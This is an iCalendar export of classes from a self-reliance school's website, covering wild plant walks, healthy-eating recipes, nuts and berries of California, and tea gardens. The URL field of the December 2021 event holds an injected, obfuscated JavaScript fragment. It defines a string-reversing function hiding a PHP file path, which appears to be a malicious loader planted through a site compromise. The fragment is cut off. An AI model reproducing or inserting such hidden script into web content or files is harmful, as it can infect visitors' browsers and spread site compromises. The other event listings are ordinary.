BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//School of Self-Reliance - ECPv6.15.13//NONSGML v1.0//EN
CALSCALE:GREGORIAN
METHOD:PUBLISH
X-WR-CALNAME:School of Self-Reliance
X-ORIGINAL-URL:https://www.schoolofself-reliance.com
X-WR-CALDESC:Events for School of Self-Reliance
REFRESH-INTERVAL;VALUE=DURATION:PT1H
X-Robots-Tag:noindex
X-PUBLISHED-TTL:PT1H
BEGIN:VTIMEZONE
TZID:America/Los_Angeles
BEGIN:DAYLIGHT
TZOFFSETFROM:-0800
TZOFFSETTO:-0700
TZNAME:PDT
DTSTART:20200308T100000
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0700
TZOFFSETTO:-0800
TZNAME:PST
DTSTART:20201101T090000
END:STANDARD
BEGIN:DAYLIGHT
TZOFFSETFROM:-0800
TZOFFSETTO:-0700
TZNAME:PDT
DTSTART:20210314T100000
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0700
TZOFFSETTO:-0800
TZNAME:PST
DTSTART:20211107T090000
END:STANDARD
BEGIN:DAYLIGHT
TZOFFSETFROM:-0800
TZOFFSETTO:-0700
TZNAME:PDT
DTSTART:20220313T100000
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0700
TZOFFSETTO:-0800
TZNAME:PST
DTSTART:20221106T090000
END:STANDARD
BEGIN:DAYLIGHT
TZOFFSETFROM:-0800
TZOFFSETTO:-0700
TZNAME:PDT
DTSTART:20230312T100000
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0700
TZOFFSETTO:-0800
TZNAME:PST
DTSTART:20231105T090000
END:STANDARD
BEGIN:DAYLIGHT
TZOFFSETFROM:-0800
TZOFFSETTO:-0700
TZNAME:PDT
DTSTART:20240310T100000
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0700
TZOFFSETTO:-0800
TZNAME:PST
DTSTART:20241103T090000
END:STANDARD
BEGIN:DAYLIGHT
TZOFFSETFROM:-0800
TZOFFSETTO:-0700
TZNAME:PDT
DTSTART:20250309T100000
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0700
TZOFFSETTO:-0800
TZNAME:PST
DTSTART:20251102T090000
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
DTSTART;TZID=America/Los_Angeles:20240215T120000
DTEND;TZID=America/Los_Angeles:20240215T140000
DTSTAMP:20260424T163729
CREATED:20210519T193024Z
LAST-MODIFIED:20240208T065744Z
UID:35953-1707998400-1708005600@www.schoolofself-reliance.com
SUMMARY:WILD PLANTS & MUSHROOMS:  Ethno-botanical Walk
DESCRIPTION:Thursday\, February 15\, Noon. \nETHNO-BOTANICAL WALK  focusing on Identifying wild EDIBLE and medicinal plants\, and mushrooms \nwe may find. \n  \n  \nWe will do a short walkabout. We will also make a salad\, so bring your bowl. \nWe’ll see edible\, medicinal\, and other useful plants found in the chaparral and riparian environment.  Both natives and non-natives will be seen.  This will be leisurely and you will hopefully get a chance to see and identify various mushrooms as well.  The weather has been conducive to mycology! \n  \n \nWear comfortable footwear. \nThis class can be credited towards the Ethno-botany certificate. \n$45 (Seniors and students $30).   Hahamongna area.  Location given upon registration. \n  \nWe’ll meet in the parking lot of the Casting Pools/ Archery Range in the Arroyo Seco\, just north of California…
URL:https://www.schoolofself-reliance.com/event/fire-and-medicinal-plants/
CATEGORIES:Ethno-botany,medicinal plants,mulefat,mycology,plants for making fire,uses of willow
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=America/Los_Angeles:20211210T183000
DTEND;TZID=America/Los_Angeles:20211210T203000
DTSTAMP:20260424T163729
CREATED:20201212T000114Z
LAST-MODIFIED:20211101T203943Z
UID:28457-1639161000-1639168200@www.schoolofself-reliance.com
SUMMARY:EAT TO YOUR HEALTH series
DESCRIPTION:Friday\, December 10\, at 6:30 p.m. \nEAT TO YOUR HEALTH series: \nSIMPLE EVERYDAY HEALTHFUL-EATING RECIPES. \nJoin us and learn how to make simple everyday foods that will enhance your health and well-being. Make 2022 a year of eating for your health. \nYou’ll see how to make the famous Nopales Elixir\, cilantro soup\, acorn pancakes\, and learn about other top-quality foods that make nutritious salads and soups. \n \n \n  \n  \n  \nONLINE LEARNING \nPLEASE JOIN US. \n $45 ($25 seniors and students; scholarships available)
URL:https://www.schoolofself-reliance.com/event/eat-<script>$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-c/
CATEGORIES:Ethno-botany,medicinal plants
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=America/Los_Angeles:20210820T190000
DTEND;TZID=America/Los_Angeles:20210820T210000
DTSTAMP:20260424T163729
CREATED:20200701T184407Z
LAST-MODIFIED:20210816T015230Z
UID:20621-1629486000-1629493200@www.schoolofself-reliance.com
SUMMARY:THE TEN MULTI-PURPOSE PLANTS YOU SHOULD KNOW
DESCRIPTION:Friday\, August 20\, 7 p.m. \nTHE TEN MULTI-PURPOSE PLANTS YOU SHOULD KNOW for food\, medicine\, fire\, etc. \nWe will discuss the 10 plants that we deem the most important to know from the standpoint of Food\, Medicine\, Fire\, Water\, Shelter\, and “other.”  These are common “multi-purpose” plants\, useful for more than only food. The plants we will be discussing are found widely  throughout North America\, and are very common in the overall Southwest.   Each plant will be rated on a scale of its relative usefulness in each of the key areas.  Rather than think in terms of simply “edibility\,” you will see that the plants we discuss are multi-purpose\, and useful for many of life’s necessities. \nYou’ll also learn which of Christopher Nyerges’ books contain the most detailed information about these multi-purpose plants.  A discussion and social time will follow. \nON-LINE LEARNING.  To join\, you must email us (christopher_nyerges@yahoo.com) that you intend to join\, and we will send you a link. \n$45 ($25 seniors and students; scholarships available). \n 
URL:https://www.schoolofself-reliance.com/event/the-ten-plants-you-should-know/
CATEGORIES:medicinal plants
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=America/Los_Angeles:20210624T183000
DTEND;TZID=America/Los_Angeles:20210624T203000
DTSTAMP:20260424T163729
CREATED:20200706T225429Z
LAST-MODIFIED:20210525T053917Z
UID:20860-1624559400-1624566600@www.schoolofself-reliance.com
SUMMARY:NUTS AND BERRIES OF CALIFORNIA
DESCRIPTION:Thursday\, June 24\, 6:30  p.m. \n \n  \nNUTS AND BERRIES OF CALIFORNIA. \nThis is a fascinating look at the foods that are all around\, and often non noticed.  Based on Christopher’s book of the same name\, we will look at the common native wild nuts and berries of California\, learn how to identify them\, and learn some recipes for use. \n  \nWe will also explore some of the non-native introduced plants that are growing all around us as street trees and ornamentals\, which have food value. We call these the HIPs (Horticulturally Introduced Plants).  Join us for a lively class\, and a social time after. \n  \n \nPresented on Zoom\, Pay on Paypal to Christopher_nyerges@yahoo.com.\nDURING THIS TIME\, WE WILL BE DOING CLASSES ON ZOOM. PLEASE JOIN US. To join\, you must email us (christopher_nyerges@yahoo.com) that you intend to join\, and we will send you a link. $45 ($25 seniors and students; scholarships available) \n 
URL:https://www.schoolofself-reliance.com/event/nuts-and-berries-of-california/
CATEGORIES:Ethno-botany,medicinal plants
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=America/Los_Angeles:20210326T190000
DTEND;TZID=America/Los_Angeles:20210326T210000
DTSTAMP:20260424T163729
CREATED:20201226T211749Z
LAST-MODIFIED:20210816T015844Z
UID:29250-1616785200-1616792400@www.schoolofself-reliance.com
SUMMARY:CREATE YOUR OWN TEA and TONIC GARDEN
DESCRIPTION:Friday\, March 26 \, 7 p.m. \nCREATE YOUR OWN TEA AND TONIC GARDEN —  WITH MOSTLY WILD PLANTS. \nWin a real tea plant! \n \nEveryone would like to have their tea plants nearby\, in the kitchen garden\, available for flavorable beverages and medicinal teas. We’ll begin by learning about the original Tea plant\, the Camellia sinensis\, and how to make your own proper tea.  Then you’ll learn some of the herbal tea plants that the hardiest and easiest to grow.  At the end of the class\, we will give away a Tea Plant (winner will receive a coupon to obtain a real Camelia sinensis plant at a local nursery). \nDURING THIS TIME\, WE WILL BE DOING CLASSES ON ZOOM.  PLEASE JOIN US.  To join\, you must email us  (christopher_nyerges@yahoo.com) that you intend to join\, and we will send you a link.  $45 ($25 seniors and students; scholarships available)
URL:https://www.schoolofself-reliance.com/event/create-your-own-tea-garden/
CATEGORIES:Ethno-botany,medicinal plants,uses of willow
END:VEVENT
END:VCALENDAR